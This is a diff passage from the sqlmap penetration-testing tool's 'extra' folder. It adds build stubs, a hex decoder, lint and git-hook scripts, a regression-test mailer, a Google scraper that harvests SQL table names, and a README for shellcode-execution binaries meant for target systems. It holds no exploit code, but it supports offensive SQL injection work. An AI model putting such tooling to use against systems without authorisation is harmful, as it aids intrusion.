@@ -0,0 +1,8 @@
|
|||||||
|
// stdafx.cpp : source file that includes just the standard includes
|
||||||
|
// runcmd.pch will be the pre-compiled header
|
||||||
|
// stdafx.obj will contain the pre-compiled type information
|
||||||
|
|
||||||
|
#include "stdafx.h"
|
||||||
|
|
||||||
|
// TODO: reference any additional headers you need in STDAFX.H
|
||||||
|
// and not in this file
|
||||||
17
extra/runcmd/windows/runcmd/stdafx.h
Normal file
17
extra/runcmd/windows/runcmd/stdafx.h
Normal file
@@ -0,0 +1,17 @@
|
|||||||
|
// stdafx.h : include file for standard system include files,
|
||||||
|
// or project specific include files that are used frequently, but
|
||||||
|
// are changed infrequently
|
||||||
|
//
|
||||||
|
|
||||||
|
#pragma once
|
||||||
|
|
||||||
|
#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later.
|
||||||
|
#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows.
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <tchar.h>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
// TODO: reference additional headers your program requires here
|
||||||
17
extra/safe2bin/README.txt
Normal file
17
extra/safe2bin/README.txt
Normal file
@@ -0,0 +1,17 @@
|
|||||||
|
To use safe2bin.py you need to pass it the original file,
|
||||||
|
and optionally the output file name.
|
||||||
|
|
||||||
|
Example:
|
||||||
|
|
||||||
|
$ python ./safe2bin.py -i output.txt -o output.txt.bin
|
||||||
|
|
||||||
|
This will create an binary decoded file output.txt.bin. For example,
|
||||||
|
if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will
|
||||||
|
be decoded to: " test 234
|
||||||
|
newline"
|
||||||
|
|
||||||
|
If you skip the output file name, general rule is that the binary
|
||||||
|
file names are suffixed with the string '.bin'. So, that means that
|
||||||
|
the upper example can also be written in the following form:
|
||||||
|
|
||||||
|
$ python ./safe2bin.py -i output.txt
|
||||||
8
extra/safe2bin/__init__.py
Normal file
8
extra/safe2bin/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
130
extra/safe2bin/safe2bin.py
Normal file
130
extra/safe2bin/safe2bin.py
Normal file
@@ -0,0 +1,130 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
safe2bin.py - Simple safe(hex) to binary format converter
|
||||||
|
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import binascii
|
||||||
|
import re
|
||||||
|
import string
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
|
||||||
|
from optparse import OptionError
|
||||||
|
from optparse import OptionParser
|
||||||
|
|
||||||
|
# Regex used for recognition of hex encoded characters
|
||||||
|
HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
|
||||||
|
|
||||||
|
# Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n)
|
||||||
|
SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
|
||||||
|
|
||||||
|
# Characters that don't need to be safe encoded
|
||||||
|
SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
|
||||||
|
|
||||||
|
# Prefix used for hex encoded values
|
||||||
|
HEX_ENCODED_PREFIX = r"\x"
|
||||||
|
|
||||||
|
# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding)
|
||||||
|
HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__"
|
||||||
|
|
||||||
|
# String used for temporary marking of slash characters
|
||||||
|
SLASH_MARKER = "__SLASH__"
|
||||||
|
|
||||||
|
def safecharencode(value):
|
||||||
|
"""
|
||||||
|
Returns safe representation of a given basestring value
|
||||||
|
|
||||||
|
>>> safecharencode(u'test123')
|
||||||
|
u'test123'
|
||||||
|
>>> safecharencode(u'test\x01\x02\xff')
|
||||||
|
u'test\\01\\02\\03\\ff'
|
||||||
|
"""
|
||||||
|
|
||||||
|
retVal = value
|
||||||
|
|
||||||
|
if isinstance(value, basestring):
|
||||||
|
if any(_ not in SAFE_CHARS for _ in value):
|
||||||
|
retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
|
||||||
|
retVal = retVal.replace('\\', SLASH_MARKER)
|
||||||
|
|
||||||
|
for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
|
||||||
|
retVal = retVal.replace(char, repr(char).strip('\''))
|
||||||
|
|
||||||
|
retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
|
||||||
|
|
||||||
|
retVal = retVal.replace(SLASH_MARKER, "\\\\")
|
||||||
|
retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX)
|
||||||
|
elif isinstance(value, list):
|
||||||
|
for i in xrange(len(value)):
|
||||||
|
retVal[i] = safecharencode(value[i])
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
def safechardecode(value, binary=False):
|
||||||
|
"""
|
||||||
|
Reverse function to safecharencode
|
||||||
|
"""
|
||||||
|
|
||||||
|
retVal = value
|
||||||
|
if isinstance(value, basestring):
|
||||||
|
retVal = retVal.replace('\\\\', SLASH_MARKER)
|
||||||
|
|
||||||
|
while True:
|
||||||
|
match = re.search(HEX_ENCODED_CHAR_REGEX, retVal)
|
||||||
|
if match:
|
||||||
|
retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x")))))
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]:
|
||||||
|
retVal = retVal.replace(repr(char).strip('\''), char)
|
||||||
|
|
||||||
|
retVal = retVal.replace(SLASH_MARKER, '\\')
|
||||||
|
|
||||||
|
if binary:
|
||||||
|
if isinstance(retVal, unicode):
|
||||||
|
retVal = retVal.encode("utf8")
|
||||||
|
|
||||||
|
elif isinstance(value, (list, tuple)):
|
||||||
|
for i in xrange(len(value)):
|
||||||
|
retVal[i] = safechardecode(value[i])
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
def main():
|
||||||
|
usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
|
||||||
|
parser = OptionParser(usage=usage, version='0.1')
|
||||||
|
|
||||||
|
try:
|
||||||
|
parser.add_option('-i', dest='inputFile', help='Input file')
|
||||||
|
parser.add_option('-o', dest='outputFile', help='Output file')
|
||||||
|
|
||||||
|
(args, _) = parser.parse_args()
|
||||||
|
|
||||||
|
if not args.inputFile:
|
||||||
|
parser.error('Missing the input file, -h for help')
|
||||||
|
|
||||||
|
except (OptionError, TypeError), e:
|
||||||
|
parser.error(e)
|
||||||
|
|
||||||
|
if not os.path.isfile(args.inputFile):
|
||||||
|
print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
f = open(args.inputFile, 'r')
|
||||||
|
data = f.read()
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
if not args.outputFile:
|
||||||
|
args.outputFile = args.inputFile + '.bin'
|
||||||
|
|
||||||
|
f = open(args.outputFile, 'wb')
|
||||||
|
f.write(safechardecode(data))
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
||||||
4
extra/shellcodeexec/README.txt
Normal file
4
extra/shellcodeexec/README.txt
Normal file
@@ -0,0 +1,4 @@
|
|||||||
|
Binary files in this folder are data files used by sqlmap on the target
|
||||||
|
system, but not executed on the system running sqlmap. They are licensed
|
||||||
|
under the terms of the GNU Lesser General Public License and their source
|
||||||
|
code is available on https://github.com/inquisb/shellcodeexec.
|
||||||
BIN
extra/shellcodeexec/linux/shellcodeexec.x32_
Normal file
BIN
extra/shellcodeexec/linux/shellcodeexec.x32_
Normal file
Binary file not shown.
BIN
extra/shellcodeexec/linux/shellcodeexec.x64_
Normal file
BIN
extra/shellcodeexec/linux/shellcodeexec.x64_
Normal file
Binary file not shown.
BIN
extra/shellcodeexec/windows/shellcodeexec.x32.exe_
Normal file
BIN
extra/shellcodeexec/windows/shellcodeexec.x32.exe_
Normal file
Binary file not shown.
7
extra/shutils/blanks.sh
Executable file
7
extra/shutils/blanks.sh
Executable file
@@ -0,0 +1,7 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||||
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
|
# Removes trailing spaces from blank lines inside project files
|
||||||
|
find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
|
||||||
27
extra/shutils/duplicates.py
Normal file
27
extra/shutils/duplicates.py
Normal file
@@ -0,0 +1,27 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
|
# Removes duplicate entries in wordlist like files
|
||||||
|
|
||||||
|
import sys
|
||||||
|
|
||||||
|
if len(sys.argv) > 0:
|
||||||
|
items = list()
|
||||||
|
|
||||||
|
with open(sys.argv[1], 'r') as f:
|
||||||
|
for item in f.readlines():
|
||||||
|
item = item.strip()
|
||||||
|
try:
|
||||||
|
str.encode(item)
|
||||||
|
if item in items:
|
||||||
|
if item:
|
||||||
|
print item
|
||||||
|
else:
|
||||||
|
items.append(item)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
with open(sys.argv[1], 'w+') as f:
|
||||||
|
f.writelines("\n".join(items))
|
||||||
7
extra/shutils/pep8.sh
Executable file
7
extra/shutils/pep8.sh
Executable file
@@ -0,0 +1,7 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||||
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
|
# Runs pep8 on all python files (prerequisite: apt-get install pep8)
|
||||||
|
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;
|
||||||
21
extra/shutils/postcommit-hook
Normal file
21
extra/shutils/postcommit-hook
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
SETTINGS="../../lib/core/settings.py"
|
||||||
|
|
||||||
|
declare -x SCRIPTPATH="${0}"
|
||||||
|
|
||||||
|
FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
|
||||||
|
|
||||||
|
if [ -f $FULLPATH ]
|
||||||
|
then
|
||||||
|
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
|
||||||
|
declare -a LINE;
|
||||||
|
NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
|
||||||
|
if [ -n "$NEW_TAG" ]
|
||||||
|
then
|
||||||
|
git commit -am "Automatic monthly tagging"
|
||||||
|
echo "Creating new tag ${NEW_TAG}";
|
||||||
|
git tag $NEW_TAG;
|
||||||
|
git push origin $NEW_TAG
|
||||||
|
fi
|
||||||
|
fi;
|
||||||
22
extra/shutils/precommit-hook
Normal file
22
extra/shutils/precommit-hook
Normal file
@@ -0,0 +1,22 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
SETTINGS="../../lib/core/settings.py"
|
||||||
|
|
||||||
|
declare -x SCRIPTPATH="${0}"
|
||||||
|
|
||||||
|
FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
|
||||||
|
|
||||||
|
if [ -f $FULLPATH ]
|
||||||
|
then
|
||||||
|
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
|
||||||
|
declare -a LINE;
|
||||||
|
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
|
||||||
|
if [ -n "$INCREMENTED" ]
|
||||||
|
then
|
||||||
|
sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH
|
||||||
|
echo "Updated ${INCREMENTED} in ${FULLPATH}";
|
||||||
|
else
|
||||||
|
echo "Something went wrong in VERSION increment"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
fi;
|
||||||
7
extra/shutils/pyflakes.sh
Executable file
7
extra/shutils/pyflakes.sh
Executable file
@@ -0,0 +1,7 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||||
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
|
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
|
||||||
|
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;
|
||||||
50
extra/shutils/pylint.py
Normal file
50
extra/shutils/pylint.py
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
#! /usr/bin/env python
|
||||||
|
|
||||||
|
# Runs pylint on all python scripts found in a directory tree
|
||||||
|
# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import sys
|
||||||
|
|
||||||
|
total = 0.0
|
||||||
|
count = 0
|
||||||
|
|
||||||
|
__RATING__ = False
|
||||||
|
|
||||||
|
def check(module):
|
||||||
|
global total, count
|
||||||
|
|
||||||
|
if module[-3:] == ".py":
|
||||||
|
|
||||||
|
print "CHECKING ", module
|
||||||
|
pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
|
||||||
|
for line in pout:
|
||||||
|
if re.match("E....:.", line):
|
||||||
|
print line
|
||||||
|
if __RATING__ and "Your code has been rated at" in line:
|
||||||
|
print line
|
||||||
|
score = re.findall("\d.\d\d", line)[0]
|
||||||
|
total += float(score)
|
||||||
|
count += 1
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
try:
|
||||||
|
print sys.argv
|
||||||
|
BASE_DIRECTORY = sys.argv[1]
|
||||||
|
except IndexError:
|
||||||
|
print "no directory specified, defaulting to current working directory"
|
||||||
|
BASE_DIRECTORY = os.getcwd()
|
||||||
|
|
||||||
|
print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
|
||||||
|
for root, dirs, files in os.walk(BASE_DIRECTORY):
|
||||||
|
if any(_ in root for _ in ("extra", "thirdparty")):
|
||||||
|
continue
|
||||||
|
for name in files:
|
||||||
|
filepath = os.path.join(root, name)
|
||||||
|
check(filepath)
|
||||||
|
|
||||||
|
if __RATING__:
|
||||||
|
print "==" * 50
|
||||||
|
print "%d modules found" % count
|
||||||
|
print "AVERAGE SCORE = %.02f" % (total / count)
|
||||||
165
extra/shutils/regressiontest.py
Normal file
165
extra/shutils/regressiontest.py
Normal file
@@ -0,0 +1,165 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
|
import codecs
|
||||||
|
import inspect
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import smtplib
|
||||||
|
import subprocess
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
import traceback
|
||||||
|
|
||||||
|
from email.mime.multipart import MIMEMultipart
|
||||||
|
from email.mime.text import MIMEText
|
||||||
|
|
||||||
|
sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe()))))
|
||||||
|
|
||||||
|
from lib.core.revision import getRevisionNumber
|
||||||
|
|
||||||
|
START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
|
||||||
|
SQLMAP_HOME = "/opt/sqlmap"
|
||||||
|
REVISION = getRevisionNumber()
|
||||||
|
|
||||||
|
SMTP_SERVER = "127.0.0.1"
|
||||||
|
SMTP_PORT = 25
|
||||||
|
SMTP_TIMEOUT = 30
|
||||||
|
FROM = "regressiontest@sqlmap.org"
|
||||||
|
#TO = "dev@sqlmap.org"
|
||||||
|
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
||||||
|
SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION)
|
||||||
|
TARGET = "debian"
|
||||||
|
|
||||||
|
def prepare_email(content):
|
||||||
|
global FROM
|
||||||
|
global TO
|
||||||
|
global SUBJECT
|
||||||
|
|
||||||
|
msg = MIMEMultipart()
|
||||||
|
msg["Subject"] = SUBJECT
|
||||||
|
msg["From"] = FROM
|
||||||
|
msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO)
|
||||||
|
|
||||||
|
msg.attach(MIMEText(content))
|
||||||
|
|
||||||
|
return msg
|
||||||
|
|
||||||
|
def send_email(msg):
|
||||||
|
global SMTP_SERVER
|
||||||
|
global SMTP_PORT
|
||||||
|
global SMTP_TIMEOUT
|
||||||
|
|
||||||
|
try:
|
||||||
|
s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT)
|
||||||
|
s.sendmail(FROM, TO, msg.as_string())
|
||||||
|
s.quit()
|
||||||
|
# Catch all for SMTP exceptions
|
||||||
|
except smtplib.SMTPException, e:
|
||||||
|
print "Failure to send email: %s" % str(e)
|
||||||
|
|
||||||
|
def failure_email(msg):
|
||||||
|
msg = prepare_email(msg)
|
||||||
|
send_email(msg)
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def main():
|
||||||
|
global SUBJECT
|
||||||
|
|
||||||
|
content = ""
|
||||||
|
test_counts = []
|
||||||
|
attachments = {}
|
||||||
|
|
||||||
|
updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||||
|
stdout, stderr = updateproc.communicate()
|
||||||
|
|
||||||
|
if stderr:
|
||||||
|
failure_email("Update of sqlmap failed with error:\n\n%s" % stderr)
|
||||||
|
|
||||||
|
regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False)
|
||||||
|
stdout, stderr = regressionproc.communicate()
|
||||||
|
|
||||||
|
if stderr:
|
||||||
|
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
|
||||||
|
|
||||||
|
failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
|
||||||
|
|
||||||
|
for failed_test in failed_tests:
|
||||||
|
title = failed_test[0]
|
||||||
|
test_count = int(failed_test[1])
|
||||||
|
parse = failed_test[3] if failed_test[3] else None
|
||||||
|
output_folder = failed_test[4]
|
||||||
|
traceback = False if failed_test[5] == "False" else bool(failed_test[5])
|
||||||
|
detected = False if failed_test[6] else True
|
||||||
|
|
||||||
|
test_counts.append(test_count)
|
||||||
|
|
||||||
|
console_output_file = os.path.join(output_folder, "console_output")
|
||||||
|
log_file = os.path.join(output_folder, TARGET, "log")
|
||||||
|
traceback_file = os.path.join(output_folder, "traceback")
|
||||||
|
|
||||||
|
if os.path.exists(console_output_file):
|
||||||
|
console_output_fd = codecs.open(console_output_file, "rb", "utf8")
|
||||||
|
console_output = console_output_fd.read()
|
||||||
|
console_output_fd.close()
|
||||||
|
attachments[test_count] = str(console_output)
|
||||||
|
|
||||||
|
if os.path.exists(log_file):
|
||||||
|
log_fd = codecs.open(log_file, "rb", "utf8")
|
||||||
|
log = log_fd.read()
|
||||||
|
log_fd.close()
|
||||||
|
|
||||||
|
if os.path.exists(traceback_file):
|
||||||
|
traceback_fd = codecs.open(traceback_file, "rb", "utf8")
|
||||||
|
traceback = traceback_fd.read()
|
||||||
|
traceback_fd.close()
|
||||||
|
|
||||||
|
content += "Failed test case '%s' (#%d)" % (title, test_count)
|
||||||
|
|
||||||
|
if parse:
|
||||||
|
content += " at parsing: %s:\n\n" % parse
|
||||||
|
content += "### Log file:\n\n"
|
||||||
|
content += "%s\n\n" % log
|
||||||
|
elif not detected:
|
||||||
|
content += " - SQL injection not detected\n\n"
|
||||||
|
else:
|
||||||
|
content += "\n\n"
|
||||||
|
|
||||||
|
if traceback:
|
||||||
|
content += "### Traceback:\n\n"
|
||||||
|
content += "%s\n\n" % str(traceback)
|
||||||
|
|
||||||
|
content += "#######################################################################\n\n"
|
||||||
|
|
||||||
|
end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
|
||||||
|
|
||||||
|
if content:
|
||||||
|
content += end_string
|
||||||
|
SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts))
|
||||||
|
|
||||||
|
msg = prepare_email(content)
|
||||||
|
|
||||||
|
for test_count, attachment in attachments.items():
|
||||||
|
attachment = MIMEText(attachment)
|
||||||
|
attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count)
|
||||||
|
msg.attach(attachment)
|
||||||
|
|
||||||
|
send_email(msg)
|
||||||
|
else:
|
||||||
|
SUBJECT = "Successful %s" % SUBJECT
|
||||||
|
msg = prepare_email("All test cases were successful\n\n%s" % end_string)
|
||||||
|
send_email(msg)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
log_fd = open("/tmp/sqlmapregressiontest.log", "wb")
|
||||||
|
log_fd.write("Regression test started at %s\n" % START_TIME)
|
||||||
|
|
||||||
|
try:
|
||||||
|
main()
|
||||||
|
except Exception, e:
|
||||||
|
log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc()))
|
||||||
|
|
||||||
|
log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()))
|
||||||
|
log_fd.close()
|
||||||
8
extra/sqlharvest/__init__.py
Normal file
8
extra/sqlharvest/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
141
extra/sqlharvest/sqlharvest.py
Normal file
141
extra/sqlharvest/sqlharvest.py
Normal file
@@ -0,0 +1,141 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import cookielib
|
||||||
|
import re
|
||||||
|
import socket
|
||||||
|
import sys
|
||||||
|
import urllib
|
||||||
|
import urllib2
|
||||||
|
import ConfigParser
|
||||||
|
|
||||||
|
from operator import itemgetter
|
||||||
|
|
||||||
|
TIMEOUT = 10
|
||||||
|
CONFIG_FILE = 'sqlharvest.cfg'
|
||||||
|
TABLES_FILE = 'tables.txt'
|
||||||
|
USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)'
|
||||||
|
SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic'
|
||||||
|
MAX_FILE_SIZE = 2 * 1024 * 1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it
|
||||||
|
QUERY = 'CREATE TABLE ext:sql'
|
||||||
|
REGEX_URLS = r';u=([^"]+?)&q='
|
||||||
|
REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)'
|
||||||
|
|
||||||
|
def main():
|
||||||
|
tables = dict()
|
||||||
|
cookies = cookielib.CookieJar()
|
||||||
|
cookie_processor = urllib2.HTTPCookieProcessor(cookies)
|
||||||
|
opener = urllib2.build_opener(cookie_processor)
|
||||||
|
opener.addheaders = [("User-Agent", USER_AGENT)]
|
||||||
|
|
||||||
|
conn = opener.open(SEARCH_URL)
|
||||||
|
page = conn.read() # set initial cookie values
|
||||||
|
|
||||||
|
config = ConfigParser.ConfigParser()
|
||||||
|
config.read(CONFIG_FILE)
|
||||||
|
|
||||||
|
if not config.has_section("options"):
|
||||||
|
config.add_section("options")
|
||||||
|
if not config.has_option("options", "index"):
|
||||||
|
config.set("options", "index", "0")
|
||||||
|
|
||||||
|
i = int(config.get("options", "index"))
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(TABLES_FILE, 'r') as f:
|
||||||
|
for line in f.xreadlines():
|
||||||
|
if len(line) > 0 and ',' in line:
|
||||||
|
temp = line.split(',')
|
||||||
|
tables[temp[0]] = int(temp[1])
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
socket.setdefaulttimeout(TIMEOUT)
|
||||||
|
|
||||||
|
files, old_files = None, None
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
abort = False
|
||||||
|
old_files = files
|
||||||
|
files = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10))
|
||||||
|
page = conn.read()
|
||||||
|
for match in re.finditer(REGEX_URLS, page):
|
||||||
|
files.append(urllib.unquote(match.group(1)))
|
||||||
|
if len(files) >= 10:
|
||||||
|
break
|
||||||
|
abort = (files == old_files)
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
raise
|
||||||
|
|
||||||
|
except Exception, msg:
|
||||||
|
print msg
|
||||||
|
|
||||||
|
if abort:
|
||||||
|
break
|
||||||
|
|
||||||
|
sys.stdout.write("\n---------------\n")
|
||||||
|
sys.stdout.write("Result page #%d\n" % (i + 1))
|
||||||
|
sys.stdout.write("---------------\n")
|
||||||
|
|
||||||
|
for sqlfile in files:
|
||||||
|
print sqlfile
|
||||||
|
|
||||||
|
try:
|
||||||
|
req = urllib2.Request(sqlfile)
|
||||||
|
response = urllib2.urlopen(req)
|
||||||
|
|
||||||
|
if "Content-Length" in response.headers:
|
||||||
|
if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE:
|
||||||
|
continue
|
||||||
|
|
||||||
|
page = response.read()
|
||||||
|
found = False
|
||||||
|
counter = 0
|
||||||
|
|
||||||
|
for match in re.finditer(REGEX_RESULT, page):
|
||||||
|
counter += 1
|
||||||
|
table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]')
|
||||||
|
|
||||||
|
if table and not any(_ in table for _ in ('>', '<', '--', ' ')):
|
||||||
|
found = True
|
||||||
|
sys.stdout.write('*')
|
||||||
|
|
||||||
|
if table in tables:
|
||||||
|
tables[table] += 1
|
||||||
|
else:
|
||||||
|
tables[table] = 1
|
||||||
|
if found:
|
||||||
|
sys.stdout.write("\n")
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
raise
|
||||||
|
|
||||||
|
except Exception, msg:
|
||||||
|
print msg
|
||||||
|
|
||||||
|
else:
|
||||||
|
i += 1
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
pass
|
||||||
|
|
||||||
|
finally:
|
||||||
|
with open(TABLES_FILE, 'w+') as f:
|
||||||
|
tables = sorted(tables.items(), key=itemgetter(1), reverse=True)
|
||||||
|
for table, count in tables:
|
||||||
|
f.write("%s,%d\n" % (table, count))
|
||||||
|
|
||||||
|
config.set("options", "index", str(i + 1))
|
||||||
|
with open(CONFIG_FILE, 'w+') as f:
|
||||||
|
config.write(f)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
@@ -1,25 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
